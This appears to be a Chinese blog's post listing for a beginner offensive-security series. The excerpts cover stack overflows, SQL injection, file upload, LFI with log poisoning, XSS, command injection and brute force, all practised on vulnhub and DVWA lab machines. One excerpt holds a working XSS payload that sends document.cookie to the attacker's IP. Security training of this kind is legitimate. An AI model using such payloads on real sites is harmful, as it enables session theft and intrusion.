- 博客(22)
- 收藏
- 关注
RSS订阅原创 Linux栈溢出漏洞利用详解
本节主要讲解了linux 32位系统栈溢出的利用原理。以一个实例,详细描述了linux栈溢出的原理和应用。1.栈溢出背景知识栈栈又称堆栈,由编译器自动分配释放,行为类似数据结构中的栈(先进后出)。堆栈主要有三个用途:为函数内部声明的非静态局部变量(C语言中称“自动变量”)提供存储空间。 记录函数调用过程相关的维护性信息,称为栈帧(Stack Frame)或过程活动记录(Procedure Activation Record)。它包括函数返回地址,不适合装入寄...
2021-09-04 22:08:59
4441
1
原创 黑客零基础第三章-Web漏洞实战-SQL注入pWnOS: 2.0
第八节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机pWnOS: 2.0,让大家进一步SQL注入的实际应用场景。
2021-08-29 11:53:50
1562
原创 黑客零基础第三章-Web漏洞利用第八节-SQL注入利用
本节介绍了SQL注入(非盲注),让读者理解SQL注入的利用场景和利用手段。常用的利用方法一个是读取数据库数据,直接获取有价值数据,如管理员信息等。如果数据库具备写Web目录的权限,可以直接通过SQL注入写入一句话木马完成入侵。演示了如何通过DVWA的SQL注入模块手工进行SQL注入。后续章节,会有vulnhub的靶机进行实战练习,理解SQL注入的利用方法。
2021-08-28 11:37:30
2243
原创 黑客零基础第三章-Web漏洞实战-文件上传HackInOS: 1
第五节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机HackInOS: 1让大家进一步文件上传漏洞的实际应用。如果靶机部署有疑问,请留言!目录1.信息收集2.获取低权限shell3.提权4.总结1.信息收集kali IP为192.168.17.4发现靶机IP192.168.17.9使用第二章nmap命令扫描靶机,nmap -p `nmap -p- --min-rate=10000 -T4 19...
2021-08-26 22:04:55
1845
4
原创 黑客零基础第三章-Web漏洞实战-文件上传DC5
第五节内容讲述了文件包含漏洞LIF的利用原理,并在DVWA上进行了日志投毒结合LFI入侵的实验。本节以实战的方式,结合vulnhub靶机DC5让大家进一步熟练LFI结合日志投毒的实际应用。如果靶机部署有疑问,请留言!
2021-08-24 21:50:25
1960
11
原创 黑客零基础第三章-Web漏洞利用实战-vulnhub:xss_and_mysql_file
第七节内容讲述了XSS漏洞和原理,并在DVWA上进行了盗取cookie的实验。本节以实战的方式,结合vulnhub靶机xss_and_mysql_file让大家体验如何用XSS截获cookie进行进一步入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。<script>new Image().src="http://192.168.17.4/test.php?output="+document.cookie;</scr
2021-08-23 22:11:08
3772
原创 黑客零基础第三章-Web漏洞利用第七节-XSS漏洞分析利用
本节介绍了DVWA的XSS漏洞模块,让读者理解XSS的利用场景。XSS本身是无法直接利用获取靶机shell的。常用的利用方法是获得高权限用户的cookie,进行冒用。DVWA的XSS本节只能演示利用场景,无法进行完整的渗透。后续章节,会有vulnhub的靶机进行实战练习,理解XSS的利用方法。
2021-08-17 21:52:24
3138
原创 黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。如果靶机部署有疑问,请留言!1.信息收集kali IP为192.168.17.4发现靶机IP192.168.17.5使用第二章nmap命令扫描靶机,nmap -p `nmap -p- --min-rate=10000 ..
2021-08-16 22:38:28
2623
原创 黑客零基础第三章-Web漏洞利用第五节-文件包含漏洞分析利用
本节讲述了DVWA的命令注入漏洞,并使用两种文件包含(LFI、RFI)的利用方法入侵靶机
2021-08-16 21:34:20
3223
原创 黑客零基础第三章-Web漏洞利用第三节-登陆爆破
本讲讲述了,在一个web系统无登录尝试限制的情况下,使用burp对已知用户的登录密码进行爆破。
2021-08-15 13:37:50
3121
原创 黑客零基础第三章-Web漏洞利用第一节-DVWA环境搭建
本章讲解DVWA环境搭建,先安装XAMMP,然后再XAMMP中的apache路径安装DVWA。
2021-08-15 11:33:27
2455
原创 黑客零基础第二章--信息收集第五章-靶机实战Toppo:1
Toppo:1是Vulnhub中easy的一个靶机,仅仅需要简单的信息收集,即可完成intrusion。非常适合我们的这一阶段练习
2021-08-14 22:08:15
3000
原创 黑客零基础第二章--信息收集第四章-自动化综合信息收集工具
本章讲述自动化信息收集工具nmapAutomator。该工具将很多信息收集工具进行集成,自动全面的帮助attacker收集目标信息。1.场景虚拟机:vmware攻击主机:kaliIP:192.168.239.142靶机:Windows10IP:192.168.239.1服务:xampp启动的apache2.自动化信息收集工具nmapAutomator的主要目标是将每次运行的枚举和重建过程自动化,而将我们的注意力放在真正的测试上。这将确保两件事。自动进行nmap扫描。总是有一些
2021-08-14 21:06:16
3782
原创 黑客零基础第二章-信息收集第三节-其他信息收集
1.场景虚拟机:vmware攻击主机:kaliIP:192.168.239.142靶机:外网2.其他信息收集介绍DNS域名系统(Domain Name System,DNS)是Internet上解决网上机器命名的一种系统。就像拜访朋友要先知道别人家怎么走一样,Internet上当一台主机要访问另外一台主机时,必须首先获知其地址,TCP/IP中的IP地址是由四段以“.”分开的数字组成(此处以IPv4的地址为例,IPv6的地址同理),记起来总是不如名字那么方便,所以,就采用了域名系统来管理名字
2021-08-14 21:02:05
2886
原创 黑客零基础第二章-信息收集第二节-Web目录扫描
1.场景虚拟机:vmware攻击主机:kaliIP:192.168.239.142靶机:Windows10IP:192.168.239.1服务:xampp启动的apache2.目录扫描工具介绍目录扫描工具主要针对网站目录或者后台管理地址进行暴力猜解的工具。目录扫描工具有一个共同的特性:目录字典或者后台管理字典越强大,其扫描出的目录或者后台管理地址的数目就越多、越准确。以前的目录扫描工具有啊D注入工具(目录扫描模块)等,现在的目录扫描工具有Dirb、DirBuster及Gobuster等。
2021-08-14 21:00:03
3246
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人